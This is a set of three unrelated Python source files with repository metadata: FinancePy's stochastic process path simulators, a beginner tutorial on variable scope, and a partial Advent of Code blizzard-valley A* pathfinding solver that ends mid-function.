sdt = sqrt(dt)
rhohat = sqrt(1.0 - rho * rho)
sigma2 = sigma * sigma
if scheme == FinHestonNumericalScheme.EULER.value:
# Basic scheme to first order with truncation on variance
for iPath in range(0, num_paths):
s = s0
v = v0
for iStep in range(1, num_steps + 1):
z1 = np.random.normal(0.0, 1.0) * sdt
z2 = np.random.normal(0.0, 1.0) * sdt
zV = z1
zS = rho * z1 + rhohat * z2
vplus = max(v, 0.0)
rtvplus = sqrt(vplus)
v += kappa * (theta - vplus) * dt + sigma * \
rtvplus * zV + 0.25 * sigma2 * (zV * zV - dt)
s += drift * s * dt + rtvplus * s * \
zS + 0.5 * s * vplus * (zV * zV - dt)
sPaths[iPath, iStep] = s
elif scheme == FinHestonNumericalScheme.EULERLOG.value:
# Basic scheme to first order with truncation on variance
for iPath in range(0, num_paths):
x = log(s0)
v = v0
for iStep in range(1, num_steps + 1):
zV = np.random.normal(0.0, 1.0) * sdt
zS = rho * zV + rhohat * np.random.normal(0.0, 1.0) * sdt
vplus = max(v, 0.0)
rtvplus = sqrt(vplus)
x += (drift - 0.5 * vplus) * dt + rtvplus * zS
v += kappa * (theta - vplus) * dt + sigma * \
rtvplus * zV + sigma2 * (zV * zV - dt) / 4.0
sPaths[iPath, iStep] = exp(x)
elif scheme == FinHestonNumericalScheme.QUADEXP.value:
# Due to Leif Andersen(2006)
Q = exp(-kappa * dt)
psic = 1.50
gamma1 = 0.50
gamma2 = 0.50
K0 = -rho * kappa * theta * dt / sigma
K1 = gamma1 * dt * (kappa * rho / sigma - 0.5) - rho / sigma
K2 = gamma2 * dt * (kappa * rho / sigma - 0.5) + rho / sigma
K3 = gamma1 * dt * (1.0 - rho * rho)
K4 = gamma2 * dt * (1.0 - rho * rho)
A = K2 + 0.5 * K4
mu = drift
c1 = sigma2 * Q * (1.0 - Q) / kappa
c2 = theta * sigma2 * ((1.0 - Q)**2) / 2.0 / kappa
for iPath in range(0, num_paths):
x = log(s0)
vn = v0
for iStep in range(1, num_steps + 1):
zV = np.random.normal(0, 1)
zS = rho * zV + rhohat * np.random.normal(0, 1)
m = theta + (vn - theta) * Q
m2 = m * m
s2 = c1 * vn + c2
psi = s2 / m2
u = np.random.uniform(0.0, 1.0)
if psi <= psic:
b2 = 2.0 / psi - 1.0 + \
sqrt((2.0 / psi) * (2.0 / psi - 1.0))
a = m / (1.0 + b2)
b = sqrt(b2)
zV = norminvcdf(u)
vnp = a * ((b + zV)**2)
d = (1.0 - 2.0 * A * a)
M = exp((A * b2 * a) / d) / sqrt(d)
K0 = -log(M) - (K1 + 0.5 * K3) * vn
else:
p = (psi - 1.0) / (psi + 1.0)
beta = (1.0 - p) / m
if u <= p:
vnp = 0.0
else:
vnp = log((1.0 - p) / (1.0 - u)) / beta
M = p + beta * (1.0 - p) / (beta - A)
K0 = -log(M) - (K1 + 0.5 * K3) * vn
x += mu * dt + K0 + (K1 * vn + K2 * vnp) + \
sqrt(K3 * vn + K4 * vnp) * zS
sPaths[iPath, iStep] = exp(x)
vn = vnp
else:
raise FinError("Unknown FinHestonNumericalSchme")
return sPaths
###############################################################################
class FinGBMNumericalScheme(Enum):
NORMAL = 1
ANTITHETIC = 2
###############################################################################
@njit(float64[:, :](int64, int64, float64, float64, float64,
float64, int64, int64), cache=True, fastmath=True)
def get_gbm_paths(num_paths, numAnnSteps, t, mu, stock_price, sigma, scheme, seed):
np.random.seed(seed)
dt = 1.0 / numAnnSteps
num_time_steps = int(t / dt + 0.50)
vsqrt_dt = sigma * sqrt(dt)
m = exp((mu - sigma * sigma / 2.0) * dt)
if scheme == FinGBMNumericalScheme.NORMAL.value:
Sall = np.empty((num_paths, num_time_steps + 1))
Sall[:, 0] = stock_price
for it in range(1, num_time_steps + 1):
g1D = np.random.standard_normal((num_paths))
for ip in range(0, num_paths):
w = np.exp(g1D[ip] * vsqrt_dt)
Sall[ip, it] = Sall[ip, it - 1] * m * w
elif scheme == FinGBMNumericalScheme.ANTITHETIC.value:
Sall = np.empty((2 * num_paths, num_time_steps + 1))
Sall[:, 0] = stock_price
for it in range(1, num_time_steps + 1):
g1D = np.random.standard_normal((num_paths))
for ip in range(0, num_paths):
w = np.exp(g1D[ip] * vsqrt_dt)
Sall[ip, it] = Sall[ip, it - 1] * m * w
Sall[ip + num_paths, it] = Sall[ip + num_paths, it - 1] * m / w
else:
raise FinError("Unknown FinGBMNumericalScheme")
# m = np.mean(Sall[:, -1])
# v = np.var(Sall[:, -1]/Sall[:, 0])
# print("GBM", num_paths, numAnnSteps, t, mu, stock_price, sigma, scheme, m,v)
return Sall
###############################################################################
class FinVasicekNumericalScheme(Enum):
NORMAL = 1
ANTITHETIC = 2
###############################################################################
@njit(float64[:, :](int64, int64, float64, float64, float64,
float64, float64, int64, int64), cache=True, fastmath=True)
def get_vasicek_paths(num_paths,
numAnnSteps,
t,
r0,
kappa,
theta,
sigma,
scheme,
seed):
np.random.seed(seed)
dt = 1.0 / numAnnSteps
num_steps = int(t / dt)
sigmasqrt_dt = sigma * sqrt(dt)
if scheme == FinVasicekNumericalScheme.NORMAL.value:
rate_path = np.empty((num_paths, num_steps + 1))
rate_path[:, 0] = r0
for iPath in range(0, num_paths):
r = r0
z = np.random.normal(0.0, 1.0, size=(num_steps))
for iStep in range(1, num_steps + 1):
r += kappa * (theta - r) * dt + z[iStep - 1] * sigmasqrt_dt
rate_path[iPath, iStep] = r
elif scheme == FinVasicekNumericalScheme.ANTITHETIC.value:
rate_path = np.empty((2 * num_paths, num_steps + 1))
rate_path[:, 0] = r0
for iPath in range(0, num_paths):
r1 = r0
r2 = r0
z = np.random.normal(0.0, 1.0, size=(num_steps))
for iStep in range(1, num_steps + 1):
r1 = r1 + kappa * (theta - r1) * dt + \
z[iStep - 1] * sigmasqrt_dt
r2 = r2 + kappa * (theta - r2) * dt - \
z[iStep - 1] * sigmasqrt_dt
rate_path[iPath, iStep] = r1
rate_path[iPath + num_paths, iStep] = r2
return rate_path
###############################################################################
class CIRNumericalScheme(Enum):
EULER = 1
LOGNORMAL = 2
MILSTEIN = 3
KAHLJACKEL = 4
EXACT = 5 # SAMPLES EXACT DISTRIBUTION
###############################################################################
@njit(float64[:, :](int64, int64, float64, float64, float64,
float64, float64, int64, int64), cache=True, fastmath=True)
def get_cir_paths(num_paths,
numAnnSteps,
t,
r0,
kappa,
theta,
sigma,
scheme,
seed):
np.random.seed(seed)
dt = 1.0 / numAnnSteps
num_steps = int(t / dt)
rate_path = np.empty(shape=(num_paths, num_steps + 1))
rate_path[:, 0] = r0
if scheme == CIRNumericalScheme.EULER.value:
sigmasqrt_dt = sigma * sqrt(dt)
for iPath in range(0, num_paths):
r = r0
z = np.random.normal(0.0, 1.0, size=(num_steps))
for iStep in range(1, num_steps + 1):
rplus = max(r, 0.0)
sqrtrplus = sqrt(rplus)
r = r + kappa * (theta - rplus) * dt + \
sigmasqrt_dt * z[iStep - 1] * sqrtrplus
rate_path[iPath, iStep] = r
elif scheme == CIRNumericalScheme.LOGNORMAL.value:
x = exp(-kappa * dt)
y = 1.0 - x
for iPath in range(0, num_paths):
r = r0
z = np.random.normal(0.0, 1.0, size=(num_steps))
for iStep in range(1, num_steps + 1):
mean = x * r + theta * y
var = sigma * sigma * y * (x * r + 0.50 * theta * y) / kappa
sig = sqrt(log(1.0 + var / (mean * mean)))
r = mean * exp(-0.5 * sig * sig + sig * z[iStep - 1])
rate_path[iPath, iStep] = r
elif scheme == CIRNumericalScheme.MILSTEIN.value:
sigmasqrt_dt = sigma * sqrt(dt)
sigma2dt = sigma * sigma * dt / 4.0
for iPath in range(0, num_paths):
r = r0
z = np.random.normal(0.0, 1.0, size=(num_steps))
for iStep in range(1, num_steps + 1):
sqrtrplus = sqrt(max(r, 0.0))
r = r + kappa * (theta - r) * dt + \
z[iStep - 1] * sigmasqrt_dt * sqrtrplus
r = r + sigma2dt * (z[iStep - 1]**2 - 1.0)
rate_path[iPath, iStep] = r
elif scheme == CIRNumericalScheme.KAHLJACKEL.value:
bhat = theta - sigma * sigma / 4.0 / kappa
sqrt_dt = sqrt(dt)
for iPath in range(0, num_paths):
r = r0
z = np.random.normal(0.0, 1.0, size=(num_steps))
for iStep in range(1, num_steps + 1):
beta = z[iStep - 1] / sqrt_dt
sqrtrplus = sqrt(max(r, 0.0))
c = 1.0 + (sigma * beta - 2.0 * kappa *
sqrtrplus) * dt / 4.0 / sqrtrplus
r = r + (kappa * (bhat - r) + sigma *
beta * sqrtrplus) * c * dt
rate_path[iPath, iStep] = r
return rate_path
###############################################################################
| domokane/FinancePy | financepy/models/process_simulator.py | process_simulator.py | py | 14,570 | python | en | code | 1,701 | github-code | 13 |
26972998662 | # lets say we have 2 variables arrange in following way
name = "Anurag" # <- global name
def foo(): # <- global name
# global name
name = "Sayan" # <- local variable
def bar():
foo()
if something:
name = "lksdjfks"
foo()
print(name)
if something:
name = "lksdjfks"
# when you initailize any name without any kind of indentation in it the program then that name is said to be initialized in
# global scope
# AND
# when we make any name inside any 'class' or 'function' are called local to that 'class or function.'
# what is scope?
# it is basically used when we are talking about any type of name (variable name, function, etc.), where does that name belong
# and where can we access that name.
# categories of scope: -
# 1. gloable - names which can be accessed anywhere in the program
# 2. local - names which are only accessable in some portion(like function) in the program.
| annup76779/python5tutor | sayan/old_files/scopes.py | scopes.py | py | 899 | python | en | code | 0 | github-code | 13 |
21935309326 | import numpy as np
import pickle
from utils import get_immediate_subdirectories
root_dir = './data_dir'
data_file = 'data.txt'
targets_file = 'index_target.txt'
features_file = 'index_features.txt'
split_test = 0.15
split_valid = 0.15
dirs = get_immediate_subdirectories('./data_dir')
for dir in dirs:
data_path = f'{root_dir}/{dir}/data/{data_file}'
targets_path = f'{root_dir}/{dir}/data/{targets_file}'
features_path = f'{root_dir}/{dir}/data/{features_file}'
data = np.loadtxt(data_path)
index_targets = np.loadtxt(targets_path)
index_features = np.loadtxt(features_path)
np.random.seed(1)
np.random.shuffle(data)
x = data[:, [int(i) for i in index_features.tolist()]]
y = data[:, int(index_targets.tolist())]
test_start = int((1 - split_test - split_valid) * len(data))
valid_start = int((1 - split_valid) * len(data))
x_train = x[:test_start, :]
y_train = y[:test_start]
train_set = [x_train, y_train]
x_test = x[test_start:valid_start, :]
y_test = y[test_start:valid_start]
test_set = [x_test, y_test]
x_valid = x[valid_start:, :]
y_valid = y[valid_start:]
valid_set = [x_valid, y_valid]
# with open(f'../data/{dir}.pkl', 'wb') as f:
# pickle.dump((train_set, test_set, valid_set), f)
print(f'datset: {dir}, len:{len(data)}, train len: {len(x_train)}, test len: {len(x_test)}, valid len: {len(x_valid)}')
| MJHutchinson/BayesMLP | utils/convert_dataset.py | convert_dataset.py | py | 1,426 | python | en | code | 1 | github-code | 13 |
26717381504 | from sqlalchemy.orm import declarative_base
from sqlalchemy import Integer, Column, VARCHAR, DECIMAL
Base = declarative_base()
class Product(Base):
__tablename__ = 'product'
id: int = Column(Integer, primary_key=True)
name = Column(VARCHAR(20))
price = Column(DECIMAL)
def __str__(self):
return f"id: {self.id}\nname: {self.name}\nprice: {self.price}"
| ashcherbyna1/hw_anastasiia_shcherbyna | models/product.py | product.py | py | 386 | python | en | code | 0 | github-code | 13 |
70095219537 | import setuptools
with open('README.md', 'r') as fh:
long_description = fh.read()
setuptools.setup(
name='dsplib',
version='1.0.0',
author='Zach Beever',
author_email='zbeever@bu.edu',
description='Small DSP library.',
long_description=long_description,
long_description_content_type='text/markdown',
url= 'https://github.com/zbeever/dsplib',
requires= ['numpy', 'tqdm', 'numba'],
license= 'MIT',
keywords= ['digital signal processing','dsp','wavelet','fourier','fft','stft','dwt','dtwt','hilbert'],
packages= setuptools.find_packages(),
package_data={'':['*.txt','*.md']},
classifiers= [
'Programming Language :: Python :: 3',
'Development Status :: 3 - Alpha',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Topic :: Scientific/Engineering'
],
python_requires='>=3.6',
)
| zbeever/dsplib | setup.py | setup.py | py | 920 | python | en | code | 0 | github-code | 13 |
22334472955 | #Leetcode 925. Long Pressed Name
class Solution:
def isLongPressedName(self, name: str, typed: str) -> bool:
i = 0
j = 0
n = len(name)
m = len(typed)
while j<m:
if i<n and name[i] == typed[j]:
i+=1
elif j == 0 or typed[j] != typed[j-1]:
return False
j+=1
return i==n | komalupatil/Leetcode_Solutions | Easy/Long Pressed Name.py | Long Pressed Name.py | py | 405 | python | en | code | 1 | github-code | 13 |
2495577781 |
import tkinter as tk
from tkinter import *
import socket
import webbrowser
def helloWorld():
print('helloWorld')
def findIP():
print(socket.gethostbyname(socket.gethostname()))
def getIp():
print('##')
## Create Buttons
def createBtnQuit(name1):
root = tk.Tk()
root.geometry('500x700')
btn = tk.Button(root, text = name1, bd = '5', command = root.destroy)
btn.pack(side = 'top')
root.mainloop()
def createBtnFunc(cancel, Func):
root = tk.Tk()
frame = tk.Frame(root)
frame.pack()
btn = tk.Button(frame, text=cancel, fg="red",command=root.quit)
btn.pack(side=tk.LEFT)
slogan = tk.Button(frame,text=Func,command=helloWorld)
slogan.pack(side=tk.RIGHT)
root.mainloop()
def createBtnIp(mine, other):
root = tk.Tk()
frame = tk.Frame(root)
frame.pack()
slogan = tk.Button(frame,text=mine,command=findIP)
slogan.pack(side=tk.LEFT)
btn = tk.Button(frame, text=other, fg="red",command=getIp)
btn.pack(side=tk.RIGHT)
root.mainloop()
#createBtnQuit('Cancel ##')
#createBtnFunc('Quit', 'helloWorld')
#createBtnIp('myIp', 'otherIp')
## Create Webpage opener
def openWebpage(src):
return webbrowser.open(str(src))
def openWebpageHttp(src):
return webbrowser.open(('https://'+str(src)))
def openWebpageWWW(src):
return webbrowser.open('https://www.'+str(src))
def openWebpages(pages, pages1, pages2):
for src in pages:
openWebpageHttp(src)
for src in pages1:
openWebpageWWW(src)
for src in pages2:
openWebpage(src)
intro = [
'github.com/Laufer4u?tab=repositories',
'drive.google.com/drive/my-drive',
'mail.uoc.gr/imp/dynamic.php?page=mailbox#mbox:SU5CT1g',
'mail.google.com/mail/u/0/#inbox']
second = [
'google.com',
'youtube.com',
'facebook.com',
'w3schools.com/js/default.asp',
'w3schools.com/python/default.asp']
third = []
openWebpages(intro, second, third)
| nzevgolisda/tkinter.py | main.py | main.py | py | 1,930 | python | en | code | 0 | github-code | 13 |
73260107856 | #from _2factor_wrapper import _2Factor
from _2factor_wrapper.Configure2Factor import Configure2Factor
import unittest
def verify_api():
"""Test the api by verifying the API"""
instance = _2Factor(api_key='293832-67745-11e5-88de-5600000c6b13')
response = instance.verify()
assert isinstance(response, dict)
assert response['status'] == "True"
class Test2FactorConfiguration(unittest.TestCase):
def test_set_api_key(self):
self.assertEqual(Configure2Factor.set_api_key(api_key='1234'), '1234')
self.assertNotEqual(Configure2Factor.set_api_key(api_key='1234'), '9090')
def test_get_api_key_after_setting(self):
self.assertIsNotNone(Configure2Factor.set_api_key(api_key='1234'))
self.assertEqual(Configure2Factor.set_api_key(api_key='1234'), Configure2Factor.get_api_key())
if __name__ == '__main__':
unittest.main() | chiseledCoder-zz/2factor-py | tests/tests.py | tests.py | py | 837 | python | en | code | 0 | github-code | 13 |
71984698257 | # SWEA 1486번 장훈이의 높은 선반
'''
높이가 B인 선반
점원의 키는 Hi, 탑을 쌓아서 선반 위의 물건을 사용할 것
탑의 높이는 점원이 1명일 경우 그 점원의 카와 같고
2명 이상일 경우 탑을 만든 모든 점원의 키의 합과 같음
가장 낮은 탑의 높이
'''
def backtrack(n,sum_):
global min_sum
# 가지치기
if sum_ >= min_sum: # 합이 최소값을 넘어가면 리턴
return
if B == min_sum: # B와 완전 일치하면 리턴
return
if n == N: # 리스트의 인덱스를 딱 넘어가서 마지막일 때
if sum_ >= B: # 합이 선반 높이를 넘어간다면
min_sum = min(sum_, min_sum) # 최소값인지 확인
return
backtrack(n+1, sum_ + lst[n])
backtrack(n+1, sum_)
T = int(input())
for test_case in range(1,T+1):
N,B = map(int,input().split()) # N 직원수, B 선반 높이
lst = list(map(int,input().split()))
sum_ = 0
min_sum = 20*10000
backtrack(0,sum_)
ans = min_sum-B
print(f'#{test_case} {ans}') | euneuneunseok/TIL | SWEA/D4/1486. 장훈이의 높은 선반/장훈이의 높은 선반.py | 장훈이의 높은 선반.py | py | 1,140 | python | ko | code | 0 | github-code | 13 |
13885045762 | import json
import os
import copy
#format start,end to :00 or :30 format
def processHour(start,end):
#set start time to kill in schedule
if (start % 100) >= 0 and (start % 100) < 30 :
start = ((start/100)) *100
else :
start = ((start/100)) *100 + 30
#set end time to kill in schedule
if (end % 100) >= 0 and (end % 100) < 30 :
end = ( (end/100)) *100 + 30;
else :
end = ( (end/100)) *100 + 100
return start, end;
# direction :
# has a bunch of rooms:
# room : [{},{},{}]
# {} = day ; time
# day = monday,tuesday...
# time = [8:30->9-20; ...]
with open("rooms.txt","r") as f :
#prepare hourList template
hours = open("dayTemplate.txt","r");
hourList = hours.read().split("\n")
hours.close()
hourList.remove("")
errors = 0;
#prepare rooms list
read = f.read().split("\n");
rooms = {}
for mini_room in read :
#prepare dayList template
date = ["M","T","W","R","F","S"]
#create schedule template for each room
dataDay = {}
for unit in date :
dataDay[unit] = hourList[:]
rooms[mini_room] = dataDay;
rooms.pop("",None);
with open("final.json","r") as g :
allCourses = json.load(g);
for course in allCourses :
for courseObj in course["courses"]:
for offering in courseObj["offerings"]:
for section in offering["component"]:
try :
if "room" not in section or section['room'] == "WWW" or len(section["days"]) < 4 or len(section["time"]) < 4:
#filter bad data
continue;
else :
#check for used date, remove from schedule-free list, leaving only the free hours for the room
#check through monday to saturday
start = int(section["time"].split("-")[0]);
end = int(section["time"].split("-")[1]);
#format start,end to :00 or :30 format
start,end = processHour(start,end);
#get monday to friday schedules of this room
for dateCode in rooms[section["room"]].keys() :
#if found a matched date
if section["days"].find(dateCode) > -1 :
#scan the hours left in monday->friday schedule
newHours = [];
for hour in rooms[section["room"]][dateCode]:
if int(hour) < start or int(hour) >= end:
newHours.append(hour)
rooms[section["room"]][dateCode] = newHours
print("vvvvvvvvvvvvvvv");
print(newHours)
except (Exception) as e :
#if time does not exist (on-site class)
errors+=1;
print("skipped an invalid "+courseObj["course_id"]+section["days"]+section["time"])
print(e)
continue;
with open("days.json","w+") as writer :
print(str(errors)+" errors");
writer.write(json.dumps(rooms, indent=4,sort_keys=True));
| ikendoit/Langara-Scraper | roomLangara/getDays.py | getDays.py | py | 3,720 | python | en | code | 0 | github-code | 13 |
43026577034 | from aiogram import Bot, Dispatcher, types
from aiogram.utils import executor
bot = Bot(token='1650077573:AAHfZMCUxCyMdBE42gpK9JPRcRVD0O2k_gQ')
dp = Dispatcher(bot)
@dp.message_handler()
async def get_message(message: types.Message):
chat_id = message.chat.id
text = 'Какой-то другой текст'
sent_message = await bot.send_message(chat_id=chat_id, text=text)
print(sent_message)
executor.start_polling(dp)
| pol1969/aiogram | app.py | app.py | py | 443 | python | en | code | 0 | github-code | 13 |
28568289611 | import os
from typing import Any, Union, List
from pibble.api.configuration import APIConfiguration
from pibble.api.helpers.store import APISessionStore, UnconfiguredAPISessionStore
from pibble.api.exceptions import ConfigurationError
from pibble.util.log import logger, ConfigurationLoggingContext
from pibble.util.strings import pretty_print, get_uuid
class APIBase:
"""
A base class for servers and clients to inherit from.
"""
session: Union[UnconfiguredAPISessionStore, APISessionStore]
def __init__(self) -> None:
logger.debug("Initializing API base.")
self.configuration = APIConfiguration()
self.configuration.put("session_key", get_uuid())
self.session = UnconfiguredAPISessionStore()
def on_configure(self) -> None:
"""
Establishes session store, if able.
Also configures logger and sets CWD.
"""
if "logging" in self.configuration:
context = ConfigurationLoggingContext(self.configuration)
context.start()
logger.debug("Established configured logger.")
if "cwd" in self.configuration:
cwd = self.configuration["cwd"]
if "~" in cwd:
cwd = os.path.expanduser(cwd)
logger.debug(f"Changing to working directory {cwd}")
os.chdir(cwd)
if (
isinstance(self.session, UnconfiguredAPISessionStore)
and "session.store" in self.configuration
):
logger.debug("Establishing configured session store.")
self.session = APISessionStore(self.configuration)
def destroy(self) -> None:
"""
Destroys the API, clearing any state.
"""
for cls in reversed(type(self).mro()):
if hasattr(cls, "on_destroy") and "on_destroy" in cls.__dict__:
try:
logger.debug(
"Destruction handler found for superclass {0}, executing.".format(
cls.__name__
)
)
cls.on_destroy(self)
except Exception as ex:
raise ConfigurationError(str(ex))
def configure(self, **configuration: Any) -> None:
"""
Updates the configuration.
:param configuration dict: Any number of configuration values to update.
"""
self.configuration.update(**configuration)
logger.debug(
"Configuration updated on class {0}. Supers are {1}".format(
type(self).__name__,
pretty_print(*[cls.__name__ for cls in type(self).mro()]),
)
)
for cls in reversed(type(self).mro()):
if hasattr(cls, "on_configure") and "on_configure" in cls.__dict__:
try:
logger.debug(
"Configuration update handler found for superclass {0}, executing.".format(
cls.__name__
)
)
cls.on_configure(self)
except Exception as ex:
raise ConfigurationError(str(ex))
def listMethods(self) -> List[str]:
"""
Should be extended for function-based servers or clients.
"""
raise NotImplementedError()
| painebenjamin/pibble | api/base.py | base.py | py | 3,374 | python | en | code | 1 | github-code | 13 |
72102798739 | from ast import Break
from asyncio.windows_events import INFINITE
while True:
while True:
try:
problema = int(input("Dame un numero de problema entre 1-10: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if problema == 22:
exit()
elif problema < 1 or problema > 10:
print("Ese problema no existe -_-")
continue
else:
break
if problema == 1:
while True:
print("Dabes de ser mayor de edad")
try:
edad = int(input("Cual es tu edad: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if edad < 18:
print("No eres mayor de edad -_-")
continue
else:
break
print("Eres mayor de edad, tienes:",edad,"años ^w^")
elif problema == 2:
while True:
try:
num = int(input("Dame un numero positvo: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if num < 0:
print("No es positivo -_-")
continue
else:
break
print("Eres mayor de edad ^w^")
elif problema == 3:
while True:
try:
num = int(input("Dame un numero par y multiplo de 3: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if num % 2 != 0 and num % 3 == 0:
print("El numero no es par -_-")
continue
elif num % 2 == 0 and num % 3 != 0:
print("El numero no es multiplo de 3 -_-")
continue
elif num % 2 != 0 and num % 3 != 0:
print("El numero no es ni par ni multiplo de 3 -_-")
continue
else:
break
print("Es multiplo de 3 y es par ^w^")
elif problema == 4:
while True:
print("Dame tu edad y la de tu amigo")
try:
edad = int(input("Cual es tu edad: "))
edad_amigo = int(input("Cual es la edad de tu amigo: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if edad < 18 and edad_amigo >= 18:
print("No eres mayor de edad -_-")
continue
elif edad >= 18 and edad_amigo < 18:
print("Tu amigo no es mayor de edad -_-")
continue
elif edad < 18 and edad_amigo < 18:
print("Ninguno es mayor de edad -_-")
continue
else:
break
print("Son mayores de edad, tienen:",edad,"años",edad_amigo,"años ^w^")
elif problema == 5:
while True:
print("Dame tres numero consecutivos acendentes")
try:
num1 = int(input("Cual es el primer numero: "))
num2 = int(input("Cual es el segundo numero: "))
num3 = int(input("Cual es el tercer numero: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if num1 > num2 or num2 > num3:
print("No son acendentes -_-")
continue
elif num2 != num1 + 1 or num3 != num2 + 1:
print("No son consecutivos -_-")
continue
else:
break
print("Son numero consecutivos acendentes ^w^")
elif problema == 6:
while True:
print("Alguno debe de ser mayor de edad")
try:
edad = int(input("Cual es tu edad: "))
edad_a1 = int(input("Cual es su edad: "))
edad_a2 = int(input("Cual es su edad: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if edad >17 or edad_a1 > 17 or edad_a2 > 17:
break
else:
print("Ninguno es mayor de edad")
continue
print("Alguno es mayor de edad ^w^")
elif problema == 7:
while True:
print("Dame tres numeros acendentes")
try:
num1 = int(input("Cual es el primer numero: "))
except ValueError:
print("Debes escribir un número -_-")
continue
while True:
try:
num2 = int(input("Cual es el segundo numero: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if num2 <= num1:
print("No son acendentes -_-")
continue
else:
while True:
try:
num3 = int(input("Cual es el tercer numero: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if num3 <= num2:
print("No son acendentes -_-")
continue
else:
break
break
break
print("Son numero consecutivos acendentes ^w^")
elif problema == 8:
while True:
print("Dame una palabra de 8 letras")
palabra = input("La palabra es: ")
if len(palabra) < 8:
print("Tiene menos de 8 letras-_-")
continue
else:
break
print("Tiene 8 letras o mas ^w^")
elif problema == 9:
while True:
print("Dame una palabra que termine en N S o vocal")
palabra = input("La palabra es: ")
lis=["n","s","a","e","i","o","u"]
if palabra[-1] in lis:
break
else:
print("No termina en N S o vocal")
continue
print("Termina en N s o vocal ^w^")
elif problema == 10:
while True:
palabra = input("Dame una frase que termine con un sogno de puntucion: ")
lis=[".","!","?",";",",",":"]
if palabra[-1] in lis:
break
else:
print("No termina con un signo de puntucion -_-")
continue
print("Si tienete signo de puntucion final ^w^")
| XTEP63/Practicas-y-Tareas-ITESO | OS22b/Tareas/tarea6.py | tarea6.py | py | 6,836 | python | es | code | 3 | github-code | 13 |
34421121778 | # coding=utf-8
"""Tools used for solving the Day 24: Blizzard Basin puzzle."""
# Standard library imports:
from typing import Iterable
# Third party imports:
from aoc_tools.algorithms.graphs.a_star_search import ASNode, a_star_search
# Set constants:
DELTA_MAP = {"^": (0, 1), ">": (1, 0), "v": (0, -1), "<": (-1, 0)}
class Cell:
"""2D discrete location inside the blizzard valley."""
__slots__ = ["x", "y", "_id", "_hash"]
def __init__(self, x: int, y: int):
self.x, self.y = x, y
self._id = (x, y)
self._hash = hash((x, y))
def __repr__(self) -> str:
return str(self._id)
def __eq__(self, other: "Cell") -> bool:
return self._id == other._id
def __lt__(self, other: "Cell") -> bool:
return self._id < other._id
def __hash__(self) -> int:
return self._hash
def calc_distance(self, other: "Cell") -> int:
"""Compute the Manhattan distance between this Cell and another Cell."""
return abs(other.x - self.x) + abs(other.y - self.y)
class Region:
"""Define the XY limits of a 2D rectangular region composed of discrete cells."""
__slots__ = ["min_x", "max_x", "min_y", "max_y", "cells"]
def __init__(self, min_x: int, max_x: int, min_y: int, max_y: int, other: set[Cell]):
self.min_x = min_x
self.max_x = max_x
self.min_y = min_y
self.max_y = max_y
self.cells = self._get_region_cells() | other
def _get_region_cells(self) -> set[Cell]:
"""Generate one Cell per location inside the XY limits of this Region."""
x_range = range(self.min_x, self.max_x + 1)
y_range = range(self.min_y, self.max_y + 1)
return set(Cell(x=x, y=y) for x in x_range for y in y_range)
def warp_location(self, x: int, y: int) -> tuple[int, int]:
"""If XY point is outside limits, warp it over the X/Y axes to a valid point."""
if x < self.min_x:
x = self.max_x
elif self.max_x < x:
x = self.min_x
if y < self.min_y:
y = self.max_y
elif self.max_y < y:
y = self.min_y
return x, y
class Blizzard(Cell):
"""Snow-and-ice front blown by the strong winds inside the valley."""
__slots__ = ["direction", "deltas"]
def __init__(self, x: int, y: int, direction: str):
super().__init__(x=x, y=y)
self.direction = direction
self.deltas = DELTA_MAP[direction]
def __repr__(self) -> str:
return f"{self._id} {self.direction}"
def move(self, region: Region) -> "Blizzard":
"""New Blizzard located one Cell forward on the direction of this Blizzard."""
dx, dy = self.deltas
x, y = self.x + dx, self.y + dy
x, y = region.warp_location(x=x, y=y)
return Blizzard(x=x, y=y, direction=self.direction)
class SnowMap:
"""Tool for predicting the position of every blizzard blowing over the valley."""
__slots__ = ["region", "_blizzard_log", "_calm_log"]
def __init__(self, blizzards: list[Blizzard], region: Region):
self.region = region
self._blizzard_log = {0: [*blizzards]}
self._calm_log = {}
def forecast_calms(self, t: int) -> set[Cell]:
"""Compose a set of all cells without active blizzards at the target instant."""
try:
return self._calm_log[t]
except KeyError:
calm_cells = self.region.cells - set(self.forecast_blizzards(t=t))
self._calm_log.update({t: calm_cells})
return calm_cells
def forecast_blizzards(self, t: int) -> list[Blizzard]:
"""List all active blizzards at the target instant."""
try:
return self._blizzard_log[t]
except KeyError:
self._update_blizzard_log(up_to_t=t)
return self._blizzard_log[t]
def _update_blizzard_log(self, up_to_t: int):
"""Simulate and log blizzards for new time instants up to t."""
last_t = max(self._blizzard_log.keys())
blizzards = self._blizzard_log[last_t]
for t in range(last_t + 1, up_to_t + 1):
blizzards = [blz.move(region=self.region) for blz in blizzards]
self._blizzard_log[t] = blizzards
@classmethod
def from_strings(cls, strings: list[str], region: Region) -> "SnowMap":
"""Create a new SnowMap from strings describing valley's initial state."""
blizzards = cls._parse_blizzards(strings=strings)
return SnowMap(blizzards=blizzards, region=region)
@staticmethod
def _parse_blizzards(strings: list[str]) -> list[Blizzard]:
"""Build blizzard cells from strings describing the valley's initial state."""
arrows = "^", ">", "v", "<"
blizzards = []
for y, string in enumerate(strings[::-1]):
blizzards.extend(Blizzard(x=x, y=y, direction=value)
for x, value in enumerate(string) if value in arrows)
return blizzards
class Expedition(ASNode):
"""Group of star-fruit-gatherers traversing the valley one cell at a time."""
__slots__ = ["cell", "t", "goal", "snow_map"]
def __init__(self, cell: Cell, t: int, goal: Cell, snow_map: SnowMap,
parent: "Expedition" = None):
self.cell, self.t = cell, t
self.goal, self.snow_map = goal, snow_map
id_ = cell, t, tuple(sorted(self.reachable_cells))
super().__init__(id_=id_, hash_=hash(id_), parent=parent)
def __repr__(self) -> str:
return f"{self.cell}: {len(self.reachable_cells)} moves ({self.t} min)"
@property
def g(self) -> int:
"""Compute the cost for reaching the current location from the start point."""
return self.t
@property
def h(self) -> int:
"""Estimate the cost for reaching the search goal from the current location."""
return self.cell.calc_distance(other=self.goal)
def get_successors(self) -> Iterable["Expedition"]:
"""List all the immediate paths this Expedition could take from its location."""
t = self.t + 1
calm_cells = self.snow_map.forecast_calms(t=t)
for cell in self.reachable_cells & calm_cells:
